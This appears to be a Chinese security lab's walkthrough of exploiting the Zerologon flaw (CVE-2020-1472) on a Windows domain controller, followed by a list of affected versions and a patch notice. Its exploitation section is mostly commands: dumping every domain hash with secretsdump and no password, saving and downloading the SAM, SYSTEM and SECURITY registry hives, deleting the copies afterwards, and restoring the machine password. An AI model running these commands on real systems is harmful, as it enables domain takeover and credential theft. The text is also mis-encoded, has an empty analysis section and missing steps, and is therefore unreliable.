聲明
以下內(nèi)容,均為文章作者原創(chuàng),由于傳播,利用此文所提供的信息而造成的任何直接或間接的后果和損失,均由使用者本人負(fù)責(zé),長白山攻防實(shí)驗(yàn)室以及文章作者不承擔(dān)任何責(zé)任。
長白山攻防實(shí)驗(yàn)室擁有該文章的修改和解釋權(quán)。如欲轉(zhuǎn)載或傳播此文章,必須保證此文章的副本,包括版權(quán)聲明等全部內(nèi)容。聲明長白山攻防實(shí)驗(yàn)室允許,不得任意修改或增減此文章內(nèi)容,不得以任何方式將其用于商業(yè)目的。
0x01漏洞背景
NetLogon遠(yuǎn)程協(xié)議是一種在Windows 域控上使用的RPC 接口,被用于各種與用戶和機(jī)器認(rèn)證相關(guān)的任務(wù)。最常用于讓用戶使用NTLM協(xié)議登錄服務(wù)器,也用于NTP響應(yīng)認(rèn)證以及更新計(jì)算機(jī)域密碼。
0x02漏洞分析



0x03利用過程
漏洞測試環(huán)境:
攻擊機(jī):10.10.10.6
域控:10.10.10.1


1.2 使用impacket工具包 secretsdump工具dump導(dǎo)出域內(nèi)所有用
hash python secretsdump.py hack.cn/DC$@10.10.10.1 -no-pass

reg save HKLM\SYSTEM system.savereg save HKLM\SAM sam.savereg save HKLM\SECURITY security.saveget system.saveget sam.saveget security.save
下載完成后進(jìn)行刪除操作
del system.savedel sam.savedel security.save

python secretsdump.py-sam sam.save-system system.save-security security.save LOCAL
1.6 通過導(dǎo)出的原NTLMhash恢復(fù)域控密碼
python reinstall_original_pw.py DC 10.10.10.1 e9d755619bd2c460cd769560584c6d0b

0x04漏洞修復(fù)
漏洞影響范圍:
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909?(Server Core installation)
Windows Server, version 2004 (Server Core installation)
https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2020-14720x05總結(jié)
CVE-2020-1472(Zerologon)是一個(gè)比較好用的域內(nèi)提權(quán)漏洞,影響Windows sever的多個(gè)版本,只要攻擊者能訪問到目標(biāo)并且知道目標(biāo)計(jì)算機(jī)名即可,在內(nèi)網(wǎng)中是一個(gè)非常嚴(yán)重的漏洞,攻擊者在利用漏洞時(shí)還會(huì)存在使域控脫域的風(fēng)險(xiǎn)。未打補(bǔ)丁機(jī)器的需要盡快修補(bǔ)。
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?長白山攻防實(shí)驗(yàn)室
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?學(xué)習(xí)最新技術(shù)知識(shí)